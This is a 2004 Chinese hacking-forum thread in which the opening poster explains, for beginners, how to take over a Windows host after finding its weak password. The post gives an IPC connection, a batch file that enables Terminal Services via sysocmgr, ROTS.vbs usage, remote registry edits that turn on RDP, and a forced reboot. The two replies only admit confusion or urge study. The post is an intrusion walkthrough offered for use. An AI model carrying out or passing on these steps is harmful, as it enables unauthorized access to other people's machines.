黑色海岸线论坛 - Powered by Discuz! Board

标题: [原创]当你扫描到一台有弱口令的主机后```````` [打印本页]

作者: 冷雪至尊 时间: 2004-1-5 13:45 标题: [原创]当你扫描到一台有弱口令的主机后````````

发这个贴子只是为了让一些人知道如果利用弱口令入侵一台主机。有很多朋友得到了口令也不会利用``比如IPC链接``一些NET命令不太熟悉``` 我提供下面的参考```是高手的就跳过：比如现在有一台主机``用户名和密码都知道了``你可以用IPC链接`` 然后我们利用注册表替他开3389,当然可以利用批处理文件3389.bat，传到主机目录执行``` 附BAT文件参数 {echo [Components] > c:\sql echo TSEnable = on >> } c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 也可以利用rots.vbs文件来执行```` rots.vbs格式如下： {cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [r或者fr]} 我们现在来通过注册表执行点击开始->运行->regedit 点击工具栏的连接网络注册表找到下面的键值 HKEY_LOCAL_MACHINE\SYSTEM\Current Controlset\services\termservice 下的start值改为2 HKEY_LOCAL_MACHINE\system\current controlset\control\terminal server\winstations\RDP-Tcp 下的fenablewinstation改为1 然后等待主机重起就可以了``如果等得不耐烦的话就用shutdown工具重起主机````

作者: MYWAY 时间: 2004-1-5 22:35 标题: [原创]当你扫描到一台有弱口令的主机后````````

很遗憾的说...我看不懂哦~``````

作者: bigblock 时间: 2004-1-5 22:44 标题: [原创]当你扫描到一台有弱口令的主机后````````

看不懂就学嘛.你愿意一直当菜鸟/

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)